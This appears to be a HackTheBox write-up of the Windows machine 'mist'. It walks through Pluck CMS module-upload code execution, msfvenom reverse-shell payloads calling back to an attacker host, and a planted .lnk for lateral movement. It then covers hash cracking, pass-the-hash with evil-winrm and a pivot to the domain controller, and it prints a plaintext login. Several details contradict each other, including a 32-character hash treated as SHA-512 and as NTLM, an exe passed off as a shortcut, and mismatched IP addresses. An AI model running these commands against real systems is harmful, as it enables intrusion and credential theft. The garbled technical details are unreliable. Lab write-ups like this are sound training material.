HTB: mist Writeup

Machine Information

Attribute	Details
Name	mist
OS	Windows
Difficulty	Insane
Points	N/A
Release Date	N/A
IP Address	`10.129.34.85`
Author	D3vnomi

Machine Rating

⭐⭐⭐⭐⭐ (9.5/10)

Difficulty Assessment:

Enumeration: ⭐⭐⭐⭐⭐
Real-world: ⭐⭐⭐⭐⭐
CVE: ⭐⭐⭐⭐☆
CTF-like: ⭐⭐⭐⭐⭐

mist is an Insane-difficulty Windows machine running Pluck CMS 4.7.18. The attack leverages CVE-2023-50564 (Pluck CMS remote code execution via module upload) to gain an initial foothold. The exploitation path involves reconnaissance and enumeration to identify the vulnerable Pluck installation, exploitation of the CMS to achieve RCE as the web user, lateral movement to the Brandon user via a crafted .lnk file that bypasses BitDefender’s security controls, and finally privilege escalation to administrator by cracking the administrator password hash.

TL;DR: Enumeration → Pluck CMS RCE → Web user access → Lateral movement via .lnk file → Administrator hash cracking → Root.

Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- 10.129.34.85

Results:

80/tcp  open  http  Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)

Service Enumeration

Hostname: mist.htb

echo "10.129.34.85 mist.htb" >> /etc/hosts
gobuster dir -u http://mist.htb -w /usr/share/wordlists/dirb/common.txt
ffuf -u http://mist.htb/FUZZ -w /usr/share/wordlists/dirb/common.txt

Discovered URLs:

/robots.txt
/data
/docs
/login.php
/admin.php
/catalog

Identified Service: Pluck CMS 4.7.18 running on Apache with XAMPP stack.

Vulnerability Assessment

Identified Vulnerabilities:

CVE-2023-50564 — Pluck CMS RCE via authenticated module upload. Allows authenticated users to upload malicious PHP modules and achieve remote code execution.

Hash Discovery

A SHA-512 hash was discovered during enumeration: c81dde783f95...

Initial Foothold

Step 1: Pluck CMS Authentication

Navigate to http://mist.htb/login.php and authenticate with credentials:

Username: pluck
Password: lexypoo97

Step 2: Exploit CVE-2023-50564 - Module Upload RCE

Generate a PHP meterpreter payload and upload it as a module:

msfvenom -p php/meterpreter_reverse_tcp LHOST=<attacker_ip> LPORT=4444 -o miao.php
zip miao.zip miao.php

Access the admin panel at http://mist.htb/admin.php?action=installmodule and upload the miao.zip module.

Step 3: Trigger Payload

Navigate to the uploaded module:

curl http://mist.htb/data/modules/miao/miao.php

This establishes a meterpreter session as the web user (Apache/XAMPP user).

Step 4: Generate Windows Payload

From the meterpreter shell, generate a Windows executable payload for further exploitation:

msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe LHOST=<attacker_tun0_ip> LPORT=4445 -o miao.exe

Lateral Movement

Brandon User Compromise via .lnk File

Brandon’s user account has an automated script (link.ps1) that monitors the C:\Common Applications directory for Windows shortcut files (.lnk). The script compares file hashes and invokes any .lnk files that don’t match its expected hash.

Exploitation Steps:

Create a crafted .lnk file (e.g., Notepad.lnk) containing a reverse shell payload instead of the legitimate shortcut.
Write the malicious .lnk file to C:\Common Applications:

# From meterpreter shell as web user
Copy-Item miao.exe "C:\Common Applications\Notepad.lnk"

The script will detect the hash mismatch and invoke the .lnk file, executing the payload and granting a session as the Brandon user.

Note: This is a “race condition” — the script compares hashes and executes the file if different, making timing critical.

b46782b9365344abdff1a925601e0385

Crack Administrator Password Hash

Use john to crack the hash:

john --wordlist=rockyou.txt hash.txt --format=Raw-SHA512

Or use the discovered hash directly for pass-the-hash attacks.

Gain Administrator Shell

evil-winrm -i 192.168.100.101 -u Administrator -H b46782b9365344abdff1a925601e0385

Root Flag

cat C:\Users\Administrator\Desktop\root.txt

🚩 Root Flag: <REDACTED>

Domain Escalation

From the administrator shell, pivot to the domain controller:

proxychains4 psexec.py Administrator@dc01.mist.htb -k -no-pass

Attack Chain Summary

graph TD
    A["Port Scan: Port 80 Open"] --> B["Enumerate Web Services"]
    B --> C["Identify Pluck CMS 4.7.18"]
    C --> D["Authenticate to Pluck"]
    D --> E["CVE-2023-50564: Module Upload RCE"]
    E --> F["Meterpreter Shell as Web User"]
    F --> G["Craft Malicious .lnk File"]
    G --> H["Write to C:\Common Applications"]
    H --> I["Brandon's Script Executes .lnk"]
    I --> J["Meterpreter Shell as Brandon"]
    J --> K["Obtain Administrator Password Hash"]
    K --> L["Crack Hash with John"]
    L --> M["Pass-the-Hash with evil-winrm"]
    M --> N["Administrator Shell - Root Access"]
    N --> O["Pivot to Domain Controller"]

Tools Used

Tool	Purpose
`nmap`	Port scanning and service fingerprinting
`gobuster`	Directory enumeration
`ffuf`	Web fuzzing and subdomain enumeration
`john`	Password hash cracking (SHA-512)
`msfvenom`	Payload generation (PHP meterpreter, Windows meterpreter)
`Metasploit`	Multi-handler for reverse shells
`evil-winrm`	Windows Remote Management shell (pass-the-hash)
`proxychains`	Proxy chaining for domain controller pivot
`psexec.py`	Impacket utility for remote command execution
`Burp Suite`	Web application analysis
`curl`	HTTP requests and payload triggering
`PowerShell`	Windows scripting and task execution

Vulnerability Reference

#	Vulnerability	Component	Severity	Impact
1	CVE-2023-50564	Application	High	Exploitation vector

Key Learnings

Thorough enumeration is critical — every open port and service can be a potential entry point.
Configuration files and databases often contain credentials that enable lateral movement.
Privilege escalation frequently depends on misconfigurations rather than software vulnerabilities.

Author

D3vnomi

Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.

Last Updated: 08 Mar 2026

Tags: #HackTheBox #Windows #Insane #CVE-2023-50564